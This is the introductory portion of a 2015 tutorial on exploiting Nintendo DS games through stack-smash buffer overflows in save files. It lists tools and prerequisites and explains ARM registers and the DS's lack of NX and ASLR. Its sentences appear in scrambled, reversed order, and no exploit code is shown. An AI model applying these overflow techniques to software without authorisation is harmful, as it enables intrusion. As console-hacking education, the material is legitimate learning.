Also note that sometimes code is executed in Thumb mode which uses 2 bytes per instruction. In ARM, instructions are 4 bytes long, so once an instruction has been completed the PC will be incremented by 4 in order to point to the next instruction, unless the instruction itself modifies the PC. R15, also referred to as PC, is known as the Program Counter it holds the address of the instruction that is currently being executed. R14, also referred to as LR, is known as the Link Register it holds the address to return to after a function call. R13, also referred to as SP, is known as the Stack Pointer it is a pointer to the active stack - a portion of memory where data can be pushed on and off of registers. In order to understand what a Stack Smash is and how it works, you will first need to know a little bit about ARM assembly.īoth ARM processors on the DS have 16 32 bit registers, the first 13 (R0 to R12) can be used for general purpose calculations, and the last 3 have their own special purposes. There are several different types of buffer overflow, however in this tutorial we will just go over the most common: Stack Smashing overflowing a string on the stack into an address which the Program Counter will read from. I will also be using VBinDiff which isn't necessary but helps to identify the location of checksums within a save file. You will need a hex editor to edit save files I will be using Hex Editor Neo. You will need a DS emulator I recommend using DeSmuME however I have heard that NO$GBA also has excellent debugging tools. You will need an ARM compiler I will be using devkitARM from devkitPro. If you don't know what a register is, or the difference between the stack and the heap, then you probably won't get much out of this tutorial. You should have a competent understanding of fairly low level programming. If you want to learn about hacking, then exploiting DS games though their save files can be a great way to learn the basics.ĭS games operate with very little security in place, if you have some code loaded in memory then you can sometimes just jump straight to it, as opposed to in more modern systems such as the 3DS where there is the NX bit (some parts of memory can be marked as unexecutable) and in the PS Vita where there is also ASLR (the bases of modules and the stack are randomly arranged).
Exploiting DS games through stack smash vulnerabilities in save files Initial publication: March 11th, 2015
0 kommentar(er)
